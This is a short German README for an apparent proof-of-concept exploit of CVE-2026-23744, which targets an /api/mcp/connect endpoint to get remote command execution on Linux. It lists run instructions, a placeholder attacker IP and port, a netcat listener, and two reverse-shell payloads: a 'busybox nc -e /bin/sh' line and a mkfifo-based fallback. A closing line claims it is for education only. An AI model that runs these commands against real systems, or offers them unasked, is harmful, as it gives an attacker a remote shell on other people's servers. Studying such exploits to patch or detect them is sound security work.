
Proof-of-Concept-Exploit für CVE-2026-23744, das auf /api/mcp/connect abzielt, um über eine Reverse Shell Remote-Befehlsausführung auf Linux-Systemen zu erreichen.
PoC zur Ausnutzung von /api/mcp/connect für die Remote-Befehlsausführung.
pip install requests
python3 exploit.py <ziel>
Beispiel:
python3 exploit.py mcp.something.com
attacker_ip = "YOUR_IP"
port = 4444
nc -lvnp 4444
Standard:
busybox nc <IP> <PORT> -e /bin/sh
Fallback:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc <IP> <PORT> > /tmp/f
-e fehlschlägtNur für Bildungszwecke.